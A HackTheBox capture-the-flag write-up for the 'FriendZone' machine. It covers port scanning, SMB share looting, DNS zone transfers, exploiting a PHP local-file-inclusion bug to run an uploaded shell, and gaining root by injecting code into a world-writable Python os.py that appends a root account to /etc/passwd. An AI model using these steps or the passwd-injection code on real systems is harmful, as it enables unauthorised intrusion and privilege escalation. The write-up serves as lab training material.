Welcome to the FriendZone writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k

FriendZone

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:23 CEST
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 21,22,53,80,139,443,445 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:28 CEST
Nmap scan report for 10.10.10.123
Host is up (0.093s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -56m08s, deviation: 1h43m55s, median: 3m51s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2021-04-16T19:32:10+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-16T16:32:10
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.22 ms 10.10.14.1
2   93.39 ms 10.10.10.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.38 seconds

SMB

On the other hand, we have an SMB server, we are going to explore it in search of accessible routes and possible files inside.

$ smbclient -L 10.10.10.123
Enter WORKGROUP\root´s password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    Files           Disk      FriendZone Samba Server Files /etc/Files
    general         Disk      FriendZone Samba Server Files
    Development     Disk      FriendZone Samba Server Files
    IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Within the general resource we find some credentials.

$ smbclient //10.10.10.123/general
Enter WORKGROUP\root´s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

        9221460 blocks of size 1024. 6460352 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \> exit
$ cat creds.txt
creds for the admin THING:

admin:WORKWORKHhallelujah@#

And within the share Development we also have access and we can upload a PHP shell that we may be able to use later.

$ smbclient //10.10.10.123/Development
Enter WORKGROUP\root´s password: 
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (7,7 kb/s) (average 7,7 kb/s)
smb: \> ls
  .                                   D        0  Sat Apr 17 00:00:42 2021
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  shell.php                           A     2233  Sat Apr 17 00:00:42 2021

        9221460 blocks of size 1024. 6178548 blocks available
smb: \>

In the Nmap results we can read the friendzone.red domain and in this website We can see that on the page another domain can be read at the email address info@friendzoneportal.red.

friendzoneportal.red

DNS Enumeration

Let's see what subdomains it has.

$ dig @10.10.10.123 friendzoneportal.red axfr

; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red.   604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.   604800  IN  AAAA    ::1
friendzoneportal.red.   604800  IN  NS  localhost.
friendzoneportal.red.   604800  IN  A   127.0.0.1
admin.friendzoneportal.red. 604800 IN   A   127.0.0.1
files.friendzoneportal.red. 604800 IN   A   127.0.0.1
imports.friendzoneportal.red. 604800 IN A   127.0.0.1
vpn.friendzoneportal.red. 604800 IN A   127.0.0.1
friendzoneportal.red.   604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 100 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 23:30:02 CEST 2021
;; XFR size: 9 records (messages 1, bytes 309)

friendzone.red

DNS Enumeration

The machine has a working DNS server. We are going to list the domains you have.

$ dig @10.10.10.123 friendzone.red axfr

; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.     604800  IN  AAAA    ::1
friendzone.red.     604800  IN  NS  localhost.
friendzone.red.     604800  IN  A   127.0.0.1
administrator1.friendzone.red. 604800 IN A  127.0.0.1
hr.friendzone.red.  604800  IN  A   127.0.0.1
uploads.friendzone.red. 604800  IN  A   127.0.0.1
friendzone.red.     604800  IN  SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 18:33:55 CEST 2021
;; XFR size: 8 records (messages 1, bytes 289)

We have several subdomains available, we are going to add them to the file /etc/hosts.

Cool! Inside the general share we have a file called creds.txt with some credentials of the user admin.

administrator1.friendzone.red

Well, checking the subdomains found, I have seen that administrator1.friendzone.red with HTTPS shows us a login page.

We test the credentials obtained and they are correct!

Login Done ! visit /dashboard.php

It is telling us that we can use the image_id and pagename parameters so, maybe we can upload an image or some file and if we remember, there was a subdomain called uploads.friendzone.red.

Gobuster

Let's find something that is useful for us to use on the website as parameters.

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/16 19:07:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/16 19:10:35 Finished
===============================================================
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/images/ -x jpg,png,jpeg -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/images/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     jpg,png,jpeg
[+] Timeout:        10s
===============================================================
2021/04/16 19:34:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.jpg (Status: 403)
/.htpasswd.png (Status: 403)
/.htpasswd.jpeg (Status: 403)
/.htaccess (Status: 403)
/.htaccess.jpg (Status: 403)
/.htaccess.png (Status: 403)
/.htaccess.jpeg (Status: 403)
/a.jpg (Status: 200)
/b.jpg (Status: 200)
Progress: 16426 / 20471 (80.24%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/04/16 19:44:29 Finished
===============================================================

Playing with the parameters, we can see that the timestamp parameter is an LFI with which we can read the content of files.

Accesing to this url we can see that it has included it and it shows us the error message. Let's try to see the content of the dashboard.php file using php://filter/convert.base64-encode/resource=.

<?php
    //echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
    //echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
    echo "<title>FriendZone Admin !</title>";
    $auth = $_COOKIE["FriendZoneAuth"];

    if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
        echo "<br><br><br>";

        echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
        echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";

        if(!isset($_GET["image_id"])){
          echo "<br><br>";
          echo "<center><p>image_name param is missed !</p></center>";
          echo "<center><p>please enter it to show the image</p></center>";
          echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
        }else{
             $image = $_GET["image_id"];
             echo "<center><img src='images/$image'></center>";

             echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
             include($_GET["pagename"].".php");
             //echo $_GET["pagename"];
        }
    }else{
        echo "<center><p>You can't see the content ! , please login !</center></p>";
    }
?>

Indeed, as we can see, it is including any file that we pass as a parameter and it includes .php at the end.

If we remember, at first we upload a PHP shell to Development. We do not know what its location is but if they tell us the location of Files which is /etc/Files so we can think that it will also be that of Development. We are going to put a terminal to listen and access our shell with the LFI.

Exploitation

Now, we access the https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell with the timestamp parameter with the path of our shell, we will get our shell.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 38554
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 00:54:54 up  5:28,  0 users,  load average: 0.00, 0.00, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (515): Inappropriate ioctl for device
bash: no job control in this shell
www-data@FriendZone:/$

And now, inside /home/friend we can read the user flag.

www-data@FriendZone:/home/friend$ cat user.txt 
CENSORED_FLAG

Post exploitation

Privilege escalation: www-data to friend

Inside the /var/www directory we find the mysql_data.conf file where we can find the MySQL credentials that will help us escalate to the friend user.

www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

And now, let's connect with SSH!

$ ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ECDSA) to the list of known hosts.
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$

Privilege escalation: friend to root

Pspy

2021/04/17 01:58:01 CMD: UID=0    PID=17217  | /usr/bin/python /opt/server_admin/reporter.py 
2021/04/17 01:58:01 CMD: UID=0    PID=17216  | /bin/sh -c /opt/server_admin/reporter.py

reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Looking at the script, we can see that there is nothing running except a print, but an import of the os library is being carried out on which if we list the library's permissions we can see that we have permission to edit it and we can inject into it a reverse shell that will be executed when the reporter.py script is launched by cron.

friend@FriendZone:~$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py

Exploitation

We are going to add the following lines in the os.py library to inject a user with root privileges in the /etc/passwd file.

passwd = open('/etc/passwd', 'r').readlines()

if not any('x4v1l0k' in s for s in passwd):
        output = open('/etc/passwd', 'a')
        output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash')
        output.close()

Now we just have to wait for the task to run... and we will be root! 

friend@FriendZone:~$ su x4v1l0k
Password: 
root@FriendZone:/home/friend# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:/home/friend# cat /root/root.txt
CENSORED_FLAG